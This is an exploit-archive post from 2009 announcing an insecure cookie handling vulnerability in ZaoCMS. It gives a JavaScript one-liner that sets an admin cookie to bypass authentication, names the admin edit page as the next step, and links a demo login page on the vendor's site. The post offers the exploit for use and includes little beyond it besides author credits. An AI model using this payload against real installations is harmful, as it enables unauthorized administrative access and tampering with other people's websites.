[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ZaoCMS Insecure Cookie Handling Vulnerability
# Published : 2009-05-21
# Author : ThE g0bL!N
# Previous Title : Article Directory (page.php) Remote Blind SQL Injection Vulnerability
# Next Title : Joomla Casino 0.3.1 Multiple SQL Injection Exploits
--------------------------------------------------------------
ZaoCMS Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.zaocms.com/
Software : ZaoCMS
---------------------------------------------------------------
Exploit:
---------
admin/login.php
javascript:document.cookie="admin=stgAdmin;path=/";
Then Go To
admin/edit.php
demo:
-------
http://demo.zaocms.com/admin/login.php
-----------------------------------------------------------------------------------------------------
His0k4 - Dr-HTmL , Dos-Dz TeaM , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------
# www.Syue.com [2009-05-21]